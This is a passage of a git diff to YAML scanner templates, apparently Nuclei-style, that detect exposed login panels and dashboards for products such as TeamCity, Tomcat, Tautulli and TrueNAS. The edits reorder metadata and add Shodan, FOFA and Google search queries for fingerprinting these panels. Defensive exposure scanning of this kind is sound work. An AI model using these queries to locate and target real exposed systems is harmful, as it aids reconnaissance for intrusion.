100644 --- a/http/exposed-panels/synapse-mobility-panel.yaml +++ b/http/exposed-panels/synapse-mobility-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Synapse Mobility Login" max-request: 1 shodan-query: http.title:"Synapse Mobility Login" + google-query: intitle:"Synapse Mobility Login" tags: panel,synapse http: diff --git a/http/exposed-panels/syncserver-panel.yaml b/http/exposed-panels/syncserver-panel.yaml index 9fc266e421..79a2e5cb28 100644 --- a/http/exposed-panels/syncserver-panel.yaml +++ b/http/exposed-panels/syncserver-panel.yaml @@ -7,11 +7,14 @@ info: classification: cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: syncserver_s650_firmware - shodan-query: html:"Symmetricom SyncServer" - vendor: microchip verified: true + max-request: 1 + vendor: microchip + product: syncserver_s650_firmware + shodan-query: + - html:"Symmetricom SyncServer" + - http.html:"symmetricom syncserver" + fofa-query: body="symmetricom syncserver" tags: panel,login,syncserver,symmetricom,detect,microchip http: diff --git a/http/exposed-panels/syncthru-web-service.yaml b/http/exposed-panels/syncthru-web-service.yaml index 8382af16ef..1ccf298c9b 100644 --- a/http/exposed-panels/syncthru-web-service.yaml +++ b/http/exposed-panels/syncthru-web-service.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:samsung:syncthru_web_service:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: syncthru_web_service - shodan-query: title:"SyncThru Web Service" - vendor: samsung verified: true + max-request: 1 + vendor: samsung + product: syncthru_web_service + shodan-query: + - title:"SyncThru Web Service" + - http.title:"syncthru web service" + fofa-query: title="syncthru web service" + google-query: intitle:"syncthru web service" tags: edb,panel,syncthru,printer,samsung http: diff --git a/http/exposed-panels/synopsys-coverity-panel.yaml b/http/exposed-panels/synopsys-coverity-panel.yaml index 331d4f798c..d9bb29f460 100644 --- a/http/exposed-panels/synopsys-coverity-panel.yaml +++ b/http/exposed-panels/synopsys-coverity-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.synopsys.com/software-integrity/security-testing/static-analysis-sast.html metadata: + verified: true max-request: 1 shodan-query: http.title:"Coverity" - verified: true tags: panel,coverity,synopsys http: diff --git a/http/exposed-panels/sysaid-panel.yaml b/http/exposed-panels/sysaid-panel.yaml index 45ad7655f5..554b09647d 100644 --- a/http/exposed-panels/sysaid-panel.yaml +++ b/http/exposed-panels/sysaid-panel.yaml @@ -11,8 +11,10 @@ info: cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: sysaid vendor: sysaid + product: sysaid + shodan-query: http.favicon.hash:1540720428 + fofa-query: icon_hash=1540720428 tags: panel,sysaid,helpdesk http: diff --git a/http/exposed-panels/tableau-panel.yaml b/http/exposed-panels/tableau-panel.yaml index fa81861354..73eca8c3a3 100644 --- a/http/exposed-panels/tableau-panel.yaml +++ b/http/exposed-panels/tableau-panel.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="Tableau-Python-Server" max-request: 1 + fofa-query: app="Tableau-Python-Server" tags: tableau,panel,python http: diff --git a/http/exposed-panels/tableau-service-manager.yaml b/http/exposed-panels/tableau-service-manager.yaml index 7eb5e798e8..3f63aceab1 100644 --- a/http/exposed-panels/tableau-service-manager.yaml +++ b/http/exposed-panels/tableau-service-manager.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:tableausoftware:tableau_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: tableau_server - shodan-query: title:"Login - Tableau Services Manager" - vendor: tableausoftware verified: true + max-request: 1 + vendor: tableausoftware + product: tableau_server + shodan-query: + - title:"Login - Tableau Services Manager" + - http.title:"login - tableau services manager" + fofa-query: title="login - tableau services manager" + google-query: intitle:"login - tableau services manager" tags: panel,tableau,tableausoftware http: diff --git a/http/exposed-panels/tailon-panel.yaml b/http/exposed-panels/tailon-panel.yaml index b3af4de5be..fd8c25ed44 100644 --- a/http/exposed-panels/tailon-panel.yaml +++ b/http/exposed-panels/tailon-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/gvalkov/tailon metadata: + verified: true max-request: 1 shodan-query: title:"tailon" - verified: true tags: panel,tailon,detect http: diff --git a/http/exposed-panels/tautulli-panel.yaml b/http/exposed-panels/tautulli-panel.yaml index e4675fdf12..a3da3361ac 100644 --- a/http/exposed-panels/tautulli-panel.yaml +++ b/http/exposed-panels/tautulli-panel.yaml @@ -12,11 +12,20 @@ info: classification: cpe: cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: tautulli - shodan-query: title:"TAUTULLI" - vendor: tautulli verified: true + max-request: 2 + vendor: tautulli + product: tautulli + shodan-query: + - title:"TAUTULLI" + - http.title:"tautulli" + - http.title:"tautulli - home" + fofa-query: + - title="tautulli - home" + - title="tautulli" + google-query: + - intitle:"tautulli" + - intitle:"tautulli - home" tags: panel,tautulli,detect http: diff --git a/http/exposed-panels/teamcity-login-panel.yaml b/http/exposed-panels/teamcity-login-panel.yaml index 44727bf827..3281b74ce3 100644 --- a/http/exposed-panels/teamcity-login-panel.yaml +++ b/http/exposed-panels/teamcity-login-panel.yaml @@ -10,11 +10,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: teamcity - shodan-query: http.component:"TeamCity" - vendor: jetbrains verified: true + max-request: 1 + vendor: jetbrains + product: teamcity + shodan-query: + - http.component:"TeamCity" + - http.title:teamcity + - http.component:"teamcity" + fofa-query: title=teamcity + google-query: intitle:teamcity tags: panel,teamcity,jetbrains,detect http: diff --git a/http/exposed-panels/teamforge-panel.yaml b/http/exposed-panels/teamforge-panel.yaml index c06f49f105..40adbb7d9b 100644 --- a/http/exposed-panels/teamforge-panel.yaml +++ b/http/exposed-panels/teamforge-panel.yaml @@ -9,10 +9,10 @@ info: reference: - https://digital.ai/products/teamforge/ metadata: - shodan-query: title:"TeamForge :" - fofa-query: title="TeamForge :" verified: true max-request: 1 + shodan-query: title:"TeamForge :" + fofa-query: title="TeamForge :" tags: panel,teamforge,login http: diff --git a/http/exposed-panels/teampass-panel.yaml b/http/exposed-panels/teampass-panel.yaml index 1a252bd95c..0392f49f41 100644 --- a/http/exposed-panels/teampass-panel.yaml +++ b/http/exposed-panels/teampass-panel.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:teampass:teampass:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 2 + vendor: teampass product: teampass shodan-query: http.html:"teampass" - vendor: teampass - verified: true + fofa-query: body="teampass" tags: panel,teampass http: diff --git a/http/exposed-panels/tekton-dashboard.yaml b/http/exposed-panels/tekton-dashboard.yaml index 680c76f60e..b7b4c178ec 100644 --- a/http/exposed-panels/tekton-dashboard.yaml +++ b/http/exposed-panels/tekton-dashboard.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Tekton" - verified: true tags: panel,tekton,exposure http: diff --git a/http/exposed-panels/telerik-server-login.yaml b/http/exposed-panels/telerik-server-login.yaml index 7c9413b9e6..8bb8ba7907 100644 --- a/http/exposed-panels/telerik-server-login.yaml +++ b/http/exposed-panels/telerik-server-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Telerik Report Server" - verified: true tags: telerik,panel http: diff --git a/http/exposed-panels/telesquare/tlr-2005ksh-login.yaml b/http/exposed-panels/telesquare/tlr-2005ksh-login.yaml index e95227938e..da8a6188d4 100644 --- a/http/exposed-panels/telesquare/tlr-2005ksh-login.yaml +++ b/http/exposed-panels/telesquare/tlr-2005ksh-login.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: tlr-2005ksh_firmware - shodan-query: http.html:"TLR-2005KSH" - vendor: telesquare verified: true + max-request: 1 + vendor: telesquare + product: tlr-2005ksh_firmware + shodan-query: + - http.html:"TLR-2005KSH" + - http.html:"tlr-2005ksh" + fofa-query: body="tlr-2005ksh" tags: panel,router,telesquare http: diff --git a/http/exposed-panels/teltonika-login.yaml b/http/exposed-panels/teltonika-login.yaml index 8915768bb9..6726e04a7c 100644 --- a/http/exposed-panels/teltonika-login.yaml +++ b/http/exposed-panels/teltonika-login.yaml @@ -12,8 +12,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Teltonika -Web UI" | intitle:"Teltonika-RUT -Web UI" inurl:"/cgi-bin/luci" max-request: 1 + google-query: intitle:"Teltonika -Web UI" | intitle:"Teltonika-RUT -Web UI" inurl:"/cgi-bin/luci" tags: panel,teltonika,edb http: diff --git a/http/exposed-panels/tembosocial-panel.yaml b/http/exposed-panels/tembosocial-panel.yaml index b955157ccf..305d96579b 100644 --- a/http/exposed-panels/tembosocial-panel.yaml +++ b/http/exposed-panels/tembosocial-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"TemboSocial Administration" - verified: true tags: panel,tembosocial http: diff --git a/http/exposed-panels/tenda-11n-wireless-router-login.yaml b/http/exposed-panels/tenda-11n-wireless-router-login.yaml index d895127329..46cabbe02b 100644 --- a/http/exposed-panels/tenda-11n-wireless-router-login.yaml +++ b/http/exposed-panels/tenda-11n-wireless-router-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-668 metadata: - google-query: intitle:"Tenda 11N Wireless Router Login Screen" max-request: 1 shodan-query: http.title:"Tenda 11N Wireless Router Login Screen" + google-query: intitle:"Tenda 11N Wireless Router Login Screen" tags: panel,tenda http: diff --git a/http/exposed-panels/tenda-web-master.yaml b/http/exposed-panels/tenda-web-master.yaml index 42ecfaeb71..625c826a59 100644 --- a/http/exposed-panels/tenda-web-master.yaml +++ b/http/exposed-panels/tenda-web-master.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Tenda Web Master" - verified: true tags: panel,tenda,router http: diff --git a/http/exposed-panels/teradek-panel.yaml b/http/exposed-panels/teradek-panel.yaml index 59bea7e246..401127fe24 100644 --- a/http/exposed-panels/teradek-panel.yaml +++ b/http/exposed-panels/teradek-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=612496907587499&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: title:"Teradek Cube Administrative Console" - verified: true tags: panel,login,teradek http: diff --git a/http/exposed-panels/teradici-pcoip-panel.yaml b/http/exposed-panels/teradici-pcoip-panel.yaml index 80579ba619..8ac72f1488 100644 --- a/http/exposed-panels/teradici-pcoip-panel.yaml +++ b/http/exposed-panels/teradici-pcoip-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:teradici:pcoip_client:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: pcoip_client vendor: teradici + product: pcoip_client tags: panel,teradici,pcoip http: diff --git a/http/exposed-panels/terraform-enterprise-panel.yaml b/http/exposed-panels/terraform-enterprise-panel.yaml index 13b861163b..36a9af504e 100644 --- a/http/exposed-panels/terraform-enterprise-panel.yaml +++ b/http/exposed-panels/terraform-enterprise-panel.yaml @@ -12,11 +12,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:hashicorp:terraform:*:*:*:*:-:*:*:* metadata: - google-query: intitle:"Terraform Enterprise" max-request: 1 - product: terraform - shodan-query: title:"Terraform Enterprise" vendor: hashicorp + product: terraform + shodan-query: + - title:"Terraform Enterprise" + - http.title:"terraform enterprise" + google-query: + - intitle:"Terraform Enterprise" + - intitle:"terraform enterprise" + fofa-query: title="terraform enterprise" tags: panel,terraform,hashicorp http: diff --git a/http/exposed-panels/thinfinity-virtualui-panel.yaml b/http/exposed-panels/thinfinity-virtualui-panel.yaml index f1de282af3..1c4b607c50 100644 --- a/http/exposed-panels/thinfinity-virtualui-panel.yaml +++ b/http/exposed-panels/thinfinity-virtualui-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: thinfinity_virtualui - shodan-query: http.title:"Thinfinity VirtualUI" vendor: cybelesoft + product: thinfinity_virtualui + shodan-query: + - http.title:"Thinfinity VirtualUI" + - http.title:"thinfinity virtualui" + fofa-query: title="thinfinity virtualui" + google-query: intitle:"thinfinity virtualui" tags: panel,thinfinity,virtualui,cybelesoft http: diff --git a/http/exposed-panels/thruk-login.yaml b/http/exposed-panels/thruk-login.yaml index 8d1e82a9e6..4cc0ed7bfe 100644 --- a/http/exposed-panels/thruk-login.yaml +++ b/http/exposed-panels/thruk-login.yaml @@ -10,10 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:thruk:thruk:*:*:*:*:*:*:*:* metadata: - fofa-query: title=="Thruk Monitoring Webinterface" max-request: 1 - product: thruk vendor: thruk + product: thruk + fofa-query: + - title=="Thruk Monitoring Webinterface" + - title=="thruk monitoring webinterface" + - body="thruk" + shodan-query: http.html:"thruk" tags: thruk,panel http: diff --git a/http/exposed-panels/tibco-spotfire-panel.yaml b/http/exposed-panels/tibco-spotfire-panel.yaml index ae2a893693..c2437e9ce6 100644 --- a/http/exposed-panels/tibco-spotfire-panel.yaml +++ b/http/exposed-panels/tibco-spotfire-panel.yaml @@ -10,7 +10,7 @@ info: - https://www.tibco.com/products/tibco-spotfire metadata: verified: true - max-request: 1 + max-request: 2 shodan-query: "TIBCO Spotfire Server" tags: panel,tibco,login,detect diff --git a/http/exposed-panels/tigase-xmpp-server.yaml b/http/exposed-panels/tigase-xmpp-server.yaml index 505fcfd416..31a75a8139 100644 --- a/http/exposed-panels/tigase-xmpp-server.yaml +++ b/http/exposed-panels/tigase-xmpp-server.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=617926933711163&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: title:"Tigase XMPP Server" - verified: true tags: tigase,xmpp,server,panel,exposure http: diff --git a/http/exposed-panels/tikiwiki-cms.yaml b/http/exposed-panels/tikiwiki-cms.yaml index 13eedadfc6..15ba93ed3a 100644 --- a/http/exposed-panels/tikiwiki-cms.yaml +++ b/http/exposed-panels/tikiwiki-cms.yaml @@ -11,8 +11,10 @@ info: cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: tikiwiki_cms\/groupware vendor: tiki + product: tikiwiki_cms\/groupware + shodan-query: http.html:"tiki wiki" + fofa-query: body="tiki wiki" tags: panel,tikiwiki,tiki http: diff --git a/http/exposed-panels/tiny-file-manager.yaml b/http/exposed-panels/tiny-file-manager.yaml index cfcfdb2657..b13e2134ff 100644 --- a/http/exposed-panels/tiny-file-manager.yaml +++ b/http/exposed-panels/tiny-file-manager.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Tiny File Manager" - verified: true zoomeye-query: app:"Tiny File Manager" tags: panel,filemanager,login,detect diff --git a/http/exposed-panels/tiny-rss-panel.yaml b/http/exposed-panels/tiny-rss-panel.yaml index 8686589488..e869f18097 100644 --- a/http/exposed-panels/tiny-rss-panel.yaml +++ b/http/exposed-panels/tiny-rss-panel.yaml @@ -1,19 +1,19 @@ id: tiny-rss-panel -info: - name: Tiny RSS Panel - Detect - author: userdehghani - severity: info - description: | - Tiny Tiny RSS is a free RSS feed reader - reference: - - https://tt-rss.org/ - metadata: - verified: true - max-request: 1 - shodan-query: http.favicon.hash:-418614327 - tags: panel,tiny-rss,login,detect - +info: + name: Tiny RSS Panel - Detect + author: userdehghani + severity: info + description: | + Tiny Tiny RSS is a free RSS feed reader + reference: + - https://tt-rss.org/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-418614327 + tags: panel,tiny-rss,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/tixeo-panel.yaml b/http/exposed-panels/tixeo-panel.yaml index 6189dc45c6..44baec47d1 100644 --- a/http/exposed-panels/tixeo-panel.yaml +++ b/http/exposed-panels/tixeo-panel.yaml @@ -1,19 +1,18 @@ id: tixeo-panel -info: - name: Tixeo Login Panel - Detect - author: righettod - severity: info - description: | - Tixeo login panel was detected. - reference: - - https://www.tixeo.com/en/ - metadata: - verified: true - max-request: 1 - shodan-query: http.title:"tixeo" - tags: panel,tixeo,login,detect - +info: + name: Tixeo Login Panel - Detect + author: righettod + severity: info + description: | + Tixeo login panel was detected. + reference: + - https://www.tixeo.com/en/ + metadata: + verified: true + max-request: 3 + shodan-query: "http.title:\"tixeo\"" + tags: panel,tixeo,login,detect http: - method: GET path: diff --git a/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml b/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml index d25af98bf6..d97e7ba948 100644 --- a/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml +++ b/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml @@ -8,9 +8,17 @@ info: cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: tomcat - shodan-query: title:"Apache Tomcat" vendor: apache + product: tomcat + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" + google-query: intitle:"apache tomcat" tags: version,tomcat,docs,panel,apache http: diff --git a/http/exposed-panels/tooljet-panel.yaml b/http/exposed-panels/tooljet-panel.yaml index 2a6cb9cf4e..fe014b06f3 100644 --- a/http/exposed-panels/tooljet-panel.yaml +++ b/http/exposed-panels/tooljet-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: title:"ToolJet - Dashboard" - verified: true tags: panel,tooljet http: diff --git a/http/exposed-panels/total-web-solutions-panel.yaml b/http/exposed-panels/total-web-solutions-panel.yaml index f8c260812e..393436e1ba 100644 --- a/http/exposed-panels/total-web-solutions-panel.yaml +++ b/http/exposed-panels/total-web-solutions-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Total Web Solutions" + "Meter Name" - max-request: 1 verified: true + max-request: 1 + google-query: intitle:"Total Web Solutions" + "Meter Name" tags: panel,edb http: diff --git a/http/exposed-panels/totemomail-panel.yaml b/http/exposed-panels/totemomail-panel.yaml index d673843c0c..591458bfb1 100644 --- a/http/exposed-panels/totemomail-panel.yaml +++ b/http/exposed-panels/totemomail-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:totemo:totemomail:*:*:*:*:*:*:*:* metadata: - google-query: intext:"totemomail" inurl:responsiveUI - max-request: 2 - product: totemomail - vendor: totemo verified: true + max-request: 2 + vendor: totemo + product: totemomail + google-query: + - intext:"totemomail" inurl:responsiveUI + - intext:"totemomail" inurl:responsiveui + shodan-query: http.html:"totemomail" inurl:responsiveui + fofa-query: body="totemomail" inurl:responsiveui tags: totemomail,panel,totemo http: diff --git a/http/exposed-panels/tracer-sc-login.yaml b/http/exposed-panels/tracer-sc-login.yaml index 47875d98b1..2e6dd23eb3 100644 --- a/http/exposed-panels/tracer-sc-login.yaml +++ b/http/exposed-panels/tracer-sc-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:h:trane:tracer_sc:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: tracer_sc vendor: trane + product: tracer_sc tags: tracer,trane,iot,panel,login http: diff --git a/http/exposed-panels/traefik-dashboard.yaml b/http/exposed-panels/traefik-dashboard.yaml index 3d62bfb352..b0a7b0471f 100644 --- a/http/exposed-panels/traefik-dashboard.yaml +++ b/http/exposed-panels/traefik-dashboard.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: traefik product: traefik shodan-query: http.title:"traefik" - vendor: traefik - verified: true + fofa-query: title="traefik" + google-query: intitle:"traefik" tags: panel,traefik http: diff --git a/http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml b/http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml index b6bbb15c16..fff5c7622e 100644 --- a/http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml +++ b/http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml @@ -11,9 +11,12 @@ info: cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: tew-827dru_firmware - shodan-query: http.html:"TEW-827DRU" vendor: trendnet + product: tew-827dru_firmware + shodan-query: + - http.html:"TEW-827DRU" + - http.html:"tew-827dru" + fofa-query: body="tew-827dru" tags: panel,router,trendnet http: diff --git a/http/exposed-panels/truenas-scale-panel.yaml b/http/exposed-panels/truenas-scale-panel.yaml index 5c1cd79e52..813609f04c 100644 --- a/http/exposed-panels/truenas-scale-panel.yaml +++ b/http/exposed-panels/truenas-scale-panel.yaml @@ -11,11 +11,14 @@ info: classification: cpe: cpe:2.3:h:ixsystems:truenas:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: truenas - shodan-query: html:"TrueNAS" - vendor: ixsystems verified: true + max-request: 1 + vendor: ixsystems + product: truenas + shodan-query: + - html:"TrueNAS" + - http.html:"truenas" + fofa-query: body="truenas" tags: login,panel,truenas,ixsystems http: diff --git a/http/exposed-panels/tufin-securetrack-login.yaml b/http/exposed-panels/tufin-securetrack-login.yaml index 115bb433e3..577e380610 100644 --- a/http/exposed-panels/tufin-securetrack-login.yaml +++ b/http/exposed-panels/tufin-securetrack-login.yaml @@ -12,11 +12,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:tufin:securetrack:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"SecureTrack - Tufin Technologies" max-request: 1 - product: securetrack - shodan-query: http.title:"SecureTrack - Tufin Technologies" vendor: tufin + product: securetrack + shodan-query: + - http.title:"SecureTrack - Tufin Technologies" + - http.title:"securetrack - tufin technologies" + google-query: + - intitle:"SecureTrack - Tufin Technologies" + - intitle:"securetrack - tufin technologies" + fofa-query: title="securetrack - tufin technologies" tags: panel,tufin http: diff --git a/http/exposed-panels/tup-openframe.yaml b/http/exposed-panels/tup-openframe.yaml index 7330750ff1..25cdb143b4 100644 --- a/http/exposed-panels/tup-openframe.yaml +++ b/http/exposed-panels/tup-openframe.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=642772827893240&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:824580113 - verified: true tags: exposure,login,tup,openframe,panel http: diff --git a/http/exposed-panels/turnkey-openvpn.yaml b/http/exposed-panels/turnkey-openvpn.yaml index 7941d801ea..ba2f70bafa 100644 --- a/http/exposed-panels/turnkey-openvpn.yaml +++ b/http/exposed-panels/turnkey-openvpn.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"TurnKey OpenVPN" - verified: true tags: panel,openvpn,turnkey,webshell,vpn http: diff --git a/http/exposed-panels/typo3-login.yaml b/http/exposed-panels/typo3-login.yaml index e15c90b43c..7dd4461e14 100644 --- a/http/exposed-panels/typo3-login.yaml +++ b/http/exposed-panels/typo3-login.yaml @@ -11,8 +11,9 @@ info: cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: typo3 vendor: typo3 + product: typo3 + shodan-query: cpe:"cpe:2.3:a:typo3:typo3" tags: panel,typo3 http: diff --git a/http/exposed-panels/uipath-orchestrator-panel.yaml b/http/exposed-panels/uipath-orchestrator-panel.yaml index 6db7586ca4..fe416def0f 100644 --- a/http/exposed-panels/uipath-orchestrator-panel.yaml +++ b/http/exposed-panels/uipath-orchestrator-panel.yaml @@ -1,19 +1,19 @@ id: uipath-orchestrator-panel -info: - name: UiPath Orchestrator Login Panel - Detect - author: righettod - severity: info - description: | - UiPath Orchestrator login panel was detected. - reference: - - https://www.uipath.com/ - metadata: - verified: true - max-request: 1 - shodan-query: http.title:"UiPath Orchestrator" - tags: panel,uipath,login,detect - +info: + name: UiPath Orchestrator Login Panel - Detect + author: righettod + severity: info + description: | + UiPath Orchestrator login panel was detected. + reference: + - https://www.uipath.com/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"UiPath Orchestrator" + tags: panel,uipath,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/umbraco-login.yaml b/http/exposed-panels/umbraco-login.yaml index 037fce3221..6641c03535 100644 --- a/http/exposed-panels/umbraco-login.yaml +++ b/http/exposed-panels/umbraco-login.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:umbraco:umbraco_cms:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: umbraco_cms - shodan-query: http.title:"Umbraco" - vendor: umbraco verified: true + max-request: 1 + vendor: umbraco + product: umbraco_cms + shodan-query: + - http.title:"Umbraco" + - http.title:"umbraco" + fofa-query: title="umbraco" + google-query: intitle:"umbraco" tags: panel,umbraco,detect http: diff --git a/http/exposed-panels/unauth-xproxy-dashboard.yaml b/http/exposed-panels/unauth-xproxy-dashboard.yaml index 8660d2645e..864c2b5ac1 100644 --- a/http/exposed-panels/unauth-xproxy-dashboard.yaml +++ b/http/exposed-panels/unauth-xproxy-dashboard.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: X-Proxy Dashboard max-request: 1 + fofa-query: X-Proxy Dashboard tags: xproxy,panel http: diff --git a/http/exposed-panels/unauth/tautulli-unauth.yaml b/http/exposed-panels/unauth/tautulli-unauth.yaml index 2bc6ad3aa1..57254fe1ad 100644 --- a/http/exposed-panels/unauth/tautulli-unauth.yaml +++ b/http/exposed-panels/unauth/tautulli-unauth.yaml @@ -7,11 +7,20 @@ info: classification: cpe: cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: tautulli - shodan-query: title:"Tautulli - Home" - vendor: tautulli verified: true + max-request: 1 + vendor: tautulli + product: tautulli + shodan-query: + - title:"Tautulli - Home" + - http.title:"tautulli" + - http.title:"tautulli - home" + fofa-query: + - title="tautulli - home" + - title="tautulli" + google-query: + - intitle:"tautulli" + - intitle:"tautulli - home" tags: panel,misconfig,tautulli,unauth,exposure http: diff --git a/http/exposed-panels/unibox-panel.yaml b/http/exposed-panels/unibox-panel.yaml index 28b87df8d2..6dcfc42d98 100644 --- a/http/exposed-panels/unibox-panel.yaml +++ b/http/exposed-panels/unibox-panel.yaml @@ -6,9 +6,9 @@ info: severity: info description: Unibox Administrator panel was detected. metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:176427349 - verified: true tags: panel,unibox,login http: diff --git a/http/exposed-panels/unleash-panel.yaml b/http/exposed-panels/unleash-panel.yaml index 1aa5ff3ef6..e74d047992 100644 --- a/http/exposed-panels/unleash-panel.yaml +++ b/http/exposed-panels/unleash-panel.yaml @@ -1,19 +1,19 @@ id: unleash-panel -info: - name: Unleash Panel - Detect - author: userdehghani - severity: info - description: | - Open-source feature management solution built for developers. - reference: - - https://www.getunleash.io/ - metadata: - verified: true - max-request: 3 - shodan-query: http.favicon.hash:-608690655 - tags: panel,unleash,login,detect - +info: + name: Unleash Panel - Detect + author: userdehghani + severity: info + description: | + Open-source feature management solution built for developers. + reference: + - https://www.getunleash.io/ + metadata: + verified: true + max-request: 3 + shodan-query: http.favicon.hash:-608690655 + tags: panel,unleash,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/untangle-admin-login.yaml b/http/exposed-panels/untangle-admin-login.yaml index 5adb744943..b506e0f956 100644 --- a/http/exposed-panels/untangle-admin-login.yaml +++ b/http/exposed-panels/untangle-admin-login.yaml @@ -13,11 +13,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:untangle:ng_firewall:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: ng_firewall - shodan-query: title:"Untangle Administrator Login" - 